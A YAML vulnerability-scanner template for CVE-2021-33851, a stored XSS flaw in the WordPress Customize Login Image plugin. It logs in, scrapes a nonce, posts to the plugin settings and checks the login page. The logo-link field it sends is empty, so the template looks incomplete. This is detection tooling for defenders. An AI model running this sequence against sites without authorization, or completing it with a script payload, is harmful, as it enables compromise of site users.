id: CVE-2021-33851 info: name: Customize Login Image < 3.5.3 - Cross-Site Scripting author: 8authur severity: medium description: | A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin. reference: - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html - https://wordpress.org/plugins/customize-login-image/ - https://nvd.nist.gov/vuln/detail/cve-2021-33851 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-33851 cwe-id: CWE-79 metadata: verified: "true" tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss requests: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css= - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true matchers: - type: dsl dsl: - 'status_code_4 == 200' - 'contains(all_headers_4, "text/html")' - 'contains(body_4, "Go to ")' condition: and extractors: - type: regex name: nonce part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true